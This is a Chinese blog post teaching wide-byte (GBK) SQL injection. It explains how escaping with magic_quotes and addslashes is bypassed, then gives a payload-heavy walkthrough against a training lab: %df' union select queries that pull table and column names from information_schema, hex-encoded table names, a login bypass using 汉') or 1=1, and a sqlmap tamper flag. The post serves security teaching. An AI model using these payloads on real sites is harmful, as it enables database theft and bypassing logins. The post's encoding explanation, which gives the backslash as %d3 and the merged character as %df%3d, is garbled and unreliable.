宽字节注入

最新推荐文章于 2023-02-13 12:30:00 发布
最新推荐文章于 2023-02-13 12:30:00 发布
阅读量139 收藏
点赞数
分类专栏: SQL注入 文章标签: mysql 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45922278/article/details/109133853
版权

                                                宽字节注入

魔术引号:

magic_quotes_gpc的作用:

当PHP的传参中有特殊字符 ' " \ 就会在前面加转义字符'\',来做一定的过滤

' 和 " 内的一切都是字符串,我们输入的东西如果不能闭合单引号和双引号,

我们的输入就不会当作代码执行,就无法产生SQL注入

 

解决:

1.找一个不需要闭合的地方

=> select * from news where id=1

2.宽字节注入.

 

魔术引号在PHP5.4以上的版本被取消了,通过php配置文件也开不起.

addslashes() => 魔术引号对等效果的函数

 

GBK:两个字符组成一个汉字,占2个字节.

UFT-8:一个汉字占3个字节.

 

% => URL栏里的是URL编码 => 16进制.

 

\ => %d3

传入一个字符和原本的\凑成一个汉字.

 

' => \' => %d3' => id='1\'  -- qwe' ,无法闭合.

%df' => %df\' => %df%d3' => id='1%df%3d'  -- qwe';%df%3d被解析成汉字,实现闭合.

条件:

1.实战,尝试即可

2.数据库被设置了GBK编码等,不是万国码(UTF)

 

 

题目1:  http://inject2.lab.aqlab.cn:81/Pass-15/index.php?id=1

 

1. http://inject2.lab.aqlab.cn:81/Pass-15/index.php?id=1

%df' order by 4 -- qwe

#尝试字段数,3字段

 

2. http://inject2.lab.aqlab.cn:81/Pass-15/index.php?id=1

%df' union select 1,2,3 -- qwe

#2,3位显示

 

3. 2或3 => database()

#得出库名'widechar'

 

3.http://inject2.lab.aqlab.cn:81/Pass-15/index.php?id=1

%df' union select 1,2,table_name from information_schema.tables where table_schema=database()limit 1,1 -- qwe

#得出表名'china_flag'

 

4.http://inject2.lab.aqlab.cn:81/Pass-15/index.php?id=1

%df' union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name='china_flag' limit 1,1 -- qwe

#错误: where table_name=\'china_flag\'

#数据必须用引号括起来

=>1. 十六进制 => 在数据库中可以接收16进制的数据, 0x7e => ~ (0x 它只能是字符串,不能成为代码)

将china_flag替换成16进制,去掉' '.

http://inject2.lab.aqlab.cn:81/Pass-15/index.php?id=2 %df'  union all select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=0x6368696e615f666c6167  limit 2,1-- qw

=>2.套娃(子查询) 不推荐

http://inject2.lab.aqlab.cn:81/Pass-15/index.php?id=1

%df' union select 1,2,column_name from information_schema.columns where table_schema=database() and

table_name=(select table_name from information_schema.tables where table_schema=database() limit 1,1)-- qwe

#得出字段名'password'

 

 

题目2: http://inject2.lab.aqlab.cn:81/Pass-17/index.php

 

1. 汉') or 1=1 -- qwe

#utf-8: 3个字符

 GBK: 2字符

 \: 1个字符

#外传一个汉字(utf-8) 3个字符

 进了数据库GBK 3+1 = 4 ,两个汉字

#登入成功

 

宽字节注入的局限: 很明显.

用sqlmap跑宽字节注入:    --tamper unmagicquotes --dbs

New6ie
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
13 字节注入1
08-03
字节注入攻击 字节注入攻击是一种常见的数据库安全漏洞,攻击者可以通过 inject恶意数据库查询语句来获得敏感信息或控制数据库。这种攻击方式通常发生在使用GBK编码的数据库中,攻击者可以使用字节注入来 ...
字节注入详解-附件资源
03-05
字节注入详解-附件资源
字节注入实例
七月_的博客
08-09 2091
http://103.238.227.13:10083/?id=1 我们看一下html源码 看到编码变化了 所以是字节注入   所以我们要用%df来代替一个字节 http://103.238.227.13:10083/?id=1%df   页面正确 加个单引号页面报错 http://103.238.227.13:10083/?id=1%df’ 页面报错 存在注入  ...
SQL注入篇——字节注入
爱国小白帽
01-09 1338
注入语句: %DF’ – -
php 字节注入 转成utf8,Hr-Papers|字节注入深度讲解
weixin_30750349的博客
03-23 366
/*Team:红日安全团队团队成员:CPRTitle:字节注入*/原理介绍基本概概念字节是相对于ascII这样单字节而言的;像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的字节,实际上只有两字节GBK是一种多字符的编码,通常来说,一个gbk编码汉字,占用2个字节。一个utf-8编码的汉字,占用3个字节转义函数:为了过滤用户输入的一些数据,对特殊的字符加上反...
网络安全 字节注入 CMS网站渗透实战 学术交流
12-05
web安全初学者,跟着公开课学习了一段时间,第一次在靶场环境下,边查询边过关,请教了不少人,对blueCMS系统存在的字节注入漏洞成功进入后台,找到后台文件编写路径,写入一句话木马,通过蚁剑连接成功后,开始提...
第十九节 字节SQL注入-01
最新发布
09-15
字节注入代码分析 在字节SQL注入攻击中,攻击者可以使用 Php 的addslashes 函数来转义特殊字符,例如将“'”转义为“%DF\'”。然后,在MYSQL中,这个字符将被认为是一个合法的字符,从而 bypass 数据库的安全...
python实现sql字节注入+布尔盲注
箭雨镜屋
05-01 508
一、注意点 本文代码是对着pikachu漏洞靶场的字节注入关卡开发的,代码中的payload和参数都基于此,使用本文代码需要修改payload和部分参数,具体见代码注释 比起单纯的布尔盲注 二、代码 三、使用 四、测试 ...
mysql+字节注入_sql注入入门 之mysql字节注入
weixin_36308848的博客
01-19 145
1,如下,字节注入的原型实例代码,注意连接字符集为gbk,对传入的值已用addslashes()做了转义,另外,php是把id当做一个字符串来接收的,后面在闭合的时候需要注意下,具体如下:2,本此用于测试的 字节注入点,如下http://192.168.3.23/wide/0x01/index.php?id=23,这时当我们用经典的单引号尝试对传入参数进行干扰时发现,貌似并没有任何反应,原因很...
SQL注入字节注入演示(详细介绍字节
Firebasky的博客
05-02 4124
字节介绍原理即绕过演示 自己对字节的认识和理解,如果有错误望指出,共同学习。 字节的介绍 GBK 是占两个字节(也就是名叫字节,只要字节大于1的都是) ASCII 占一个字节 PHP中编码为GBK ,函数执行添加的是ASCII编码,mysql默认字符集是GBK等字节字符集 为什么要介绍字节字节的出现个人感觉是因为SQL语句过滤了一些字符,比如 ’ 转义成 /’ 或者 ...
深入浅出带你学习字节注入
bluemoon_0的博客
02-13 716
深入浅出带你学习字节注入
PiKachu之Sql (SQL注入)通关 2022
av11566的博客
04-18 8093
遇到一个待测点: 1、判断是否有注入(判断是否未严格校验)-->第一要素 1)可控参数的改变能否影响页面显示结果。 2)输入的SQL语句是否能报错-能通过数据库的报错,看到数据库的一些语句痕迹(select username, password from user where id = 4 and 0#3)输入的SQL语句能否不报错-我们的语句能够成功闭合 2、什么类型的注入 3、语句是否能够被恶意修改--第二个要素 4、是否能够成功执行-->第三个要素 5、获取我们想要的数据。
pikachu靶场 暴力破解 sql注入详解
winofkill的博客
12-17 2075
pikachu靶场暴力破解,sql注入详解
pikachu SQL注入合集
小城的博客
12-20 2616
这里是目录sql注入数字型注入 n天更一次,但是是因为这几天太忙了啊,一直东跑西跑,暴风哭泣 大家好,我是小城,一个刚刚起步的学渣,笨鸟先飞,可惜我领悟得太晚。但从现在开始,我会努力加油进取变强! sql注入 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语
字节注入详解
xyx107的博客
08-11 5168
尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。也有一些cms为了考虑老用户,所以出了gbk和utf-8两个版本。 我们就以gbk字符编码为示范,拉开帷幕。gbk是一种多字符编码,具体定义自行百度。但有一个地方尤其要...
MySQL 字节注入——关于GBK编码和UTF-8编码
公众号shadow sock7
04-02 5018
参考: http://blog.csdn.net/jnbbwyth/article/details/6991425 https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html这个文件原文只有ASCII字符,当我加上两个汉字之后就不得不变成了UTF-8字符。 iconv这个工具(MacOS, ubuntu和kali好像是自带的)
sql注入字节注入
07-28
SQL注入字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入: SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞,攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值